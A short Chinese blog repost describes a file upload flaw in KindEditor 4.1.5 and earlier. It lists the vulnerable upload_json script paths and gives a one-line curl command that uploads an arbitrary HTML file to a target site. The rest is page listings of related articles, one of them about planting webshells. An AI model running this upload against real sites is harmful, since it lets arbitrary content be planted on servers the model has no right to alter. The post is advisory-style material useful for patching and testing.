kindeditor<=4.1.5 文件上传漏洞

其他 2019-03-22 08:34:44 阅读次数: 0

kindeditor<=4.1.5 文件上传漏洞 - Kindeditor <=4.1.5 file upload vulnerability

　　漏洞存影响版本：小于等于4.1.5的kindeditor 编辑器

　　漏洞影响：上传任意. txt 和. html 文件

　　漏洞存在动态脚本语言： php/asp/jsp/asp.net

　　漏洞存在的证明文件：upload_json.* 具体路径如下：

　　/kindeditor/asp/upload_json.asp

　　/kindeditor/asp.net/upload_json.ashx

　　/kindeditor/jsp/upload_json.jsp

　　/kindeditor/php/upload_json.php

利用方式：

curl -F "[email protected]" http://url/kindeditor/asp/upload_json.asp?dir=file

1.html为想要上传的文件

在返回中得到上传后的路径，然后访问

猜你喜欢

转载自www.cnblogs.com/iAmSoScArEd/p/10575936.html

kindeditor<=4.1.5 文件上传漏洞

kindeditor<=4.1.5上传漏洞复现

[渗透]kindeditor4.1.5文件上传漏洞

kindeditor编辑器＜=4.1.5上传漏洞复现

《编辑器篇》kindeditor 文件上传漏洞利用

KindEditor文件上传

kindeditor 文件上传

利用KindEditor漏洞上传网马

kindEditor_upload的文件上传

Spring 结合 KindEditor 上传文件问题的解决

kindeditor 在JSP 中上传文件的配置

kindeditor 在jsp如何实现上传文件

kindeditor 图片上传

使用kindeditor上传

KindEditor图片上传

KindEditor上传图片word

KindEditor上传图片

4.1.5 文件存储空间管理

Kindeditor 4.1.10列目录漏洞

使用KindEditor完成图片上传

KindEditor 远程上传跨域

SpringMVC+KindEditor在线编辑器之文件上传

【ThinkPHP学习】ThinkPHP结合KindEditor SAE storage上传文件图片

kindeditor 在线编辑器配置上传文件功能

【Kindeditor编辑器】文件上传、空间管理

修改kindeditor支持预处理文件上传返回的结果

KindEditor 上传漏洞致近百个党政机关网站遭植入

kindeditor文件上传设置文件说明为上传文件名（JSP版）

KindEditor

文件上传漏洞攻击

今日推荐

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

国产云输入法——仅华为无云端数据上传安全问题

开源日报 | 工业开源项目OGG 1.0；姐姐，你要和我一起配置火狐吗；苹果AI遥遥落后？Fedora 40

开放签电子签章：停止新增，优化体验，前进更进（五一假期前工作）

周排行

Metasploit文件目录与入侵基本概念

跨域(CORS)请求问题[No 'Access-Control-Allow-Origin' header is present on the requested resource]常见解决方案

CodeIgniter 源码解读之 CodeIgniter.php（二）

SAS入门之（四）改变数据类型

初识元组

[数学建模]数学建模算法和模型（B站视频）（二）

Nginx 服务器源码安装配置流程

C#实现语音视频录制【基于MCapture + MFile】

开发进度4

下载安装vue的方法网址

每日归档

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)

2024-04-22(39)

2024-04-21(0)

2024-04-20(6)

2024-04-19(5)